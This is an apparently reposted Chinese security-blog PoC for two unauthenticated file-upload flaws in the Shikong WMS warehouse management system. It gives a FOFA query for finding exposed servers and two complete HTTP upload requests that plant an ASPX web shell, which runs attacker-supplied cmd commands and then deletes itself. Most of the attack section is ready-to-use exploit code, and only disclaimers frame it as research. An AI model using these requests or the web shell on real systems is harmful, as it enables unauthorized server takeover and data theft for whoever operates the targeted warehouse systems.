时空WMS-仓储精细化管理系统两处文件上传致RCE漏洞复现 PoC

admin 2024年12月2日22:37:33评论25 views字数 2491阅读8分18秒阅读模式
时空WMS-仓储精细化管理系统两处文件上传致RCE漏洞复现 PoC

产品简介

时空WMS-仓储精细化管理系统两处文件上传致RCE漏洞复现 PoC

时空WMS-仓储精细化,管理系统Q是一款高效、智能的仓储管理工具,旨在帮助企业实现仓库的精细化管理和高效运营。由郑州时空软件开发,专注于以数字化、智能化推动企业进步。该系统基于先进的仓储管理理念和技术架构,融合了物联网、移动互联等前沿技术,实现了对仓库内物资的全面、精准、高效管理、系统话用千各类仓储物流企业,包括电商仓储、第一方物流、生产仓储等多个领域。通过使用该系统,企业可以实现对仓库内物资的全面掌控和高效管理,提高库存周转率,降低库存成本,提升企业竞争优势。

时空WMS-仓储精细化管理系统两处文件上传致RCE漏洞复现 PoC

时空WMS-仓储精细化管理系统两处文件上传致RCE漏洞复现 PoC

漏洞概述

时空WMS-仓储精细化管理系统两处文件上传致RCE漏洞复现 PoC

时空WMS-仓储精细化管理系统 SaveCrash.ashx 接口存在文件上传漏洞,电子资料管理系统 /MenulmageManqerlmaaeUpload.ashx 接口存在文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web服务器。

时空WMS-仓储精细化管理系统两处文件上传致RCE漏洞复现 PoC

FOFA

时空WMS-仓储精细化管理系统两处文件上传致RCE漏洞复现 PoC

 

body="SKControlKLForJson.ashx"

时空WMS-仓储精细化管理系统两处文件上传致RCE漏洞复现 PoC

时空WMS-仓储精细化管理系统两处文件上传致RCE漏洞复现 PoC

SaveCrash.ashx漏洞复现

时空WMS-仓储精细化管理系统两处文件上传致RCE漏洞复现 PoC
POST /crash/SaveCrash.ashx HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryssh7UfnPpGU7BXfKUpgrade-Insecure-Requests: 1Accept-Encoding: gzip ------WebKitFormBoundaryssh7UfnPpGU7BXfKContent-Disposition: form-data; name="file"; filename="rce.aspx"Content-Type: text/plain <%@ Page Language="Jscript" validateRequest="false" %><%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%>------WebKitFormBoundaryssh7UfnPpGU7BXfK--

时空WMS-仓储精细化管理系统两处文件上传致RCE漏洞复现 PoC

RCE

时空WMS-仓储精细化管理系统两处文件上传致RCE漏洞复现 PoC

时空WMS-仓储精细化管理系统两处文件上传致RCE漏洞复现 PoC

ImageAdd.ashx漏洞复现

时空WMS-仓储精细化管理系统两处文件上传致RCE漏洞复现 PoC
POST /ImageUpload/ImageAdd.ashx HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryssh7UfnPpGU7BXfKUpgrade-Insecure-Requests: 1Accept-Encoding: gzip ------WebKitFormBoundaryssh7UfnPpGU7BXfKContent-Disposition: form-data; name="file"; filename="rce.aspx"Content-Type: text/plain <%@ Page Language="Jscript" validateRequest="false" %><%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%>------WebKitFormBoundaryssh7UfnPpGU7BXfK--

时空WMS-仓储精细化管理系统两处文件上传致RCE漏洞复现 PoC

RCE

时空WMS-仓储精细化管理系统两处文件上传致RCE漏洞复现 PoC

时空WMS-仓储精细化管理系统两处文件上传致RCE漏洞复现 PoC

免责声明

时空WMS-仓储精细化管理系统两处文件上传致RCE漏洞复现 PoC

文章所涉及内容,仅供安全研究与教学之用,由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。

 

原文始发于微信公众号(暗影网安实验室):时空WMS-仓储精细化管理系统两处文件上传致RCE漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月2日22:37:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   时空WMS-仓储精细化管理系统两处文件上传致RCE漏洞复现 PoChttps://cn-sec.com/archives/3460148.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息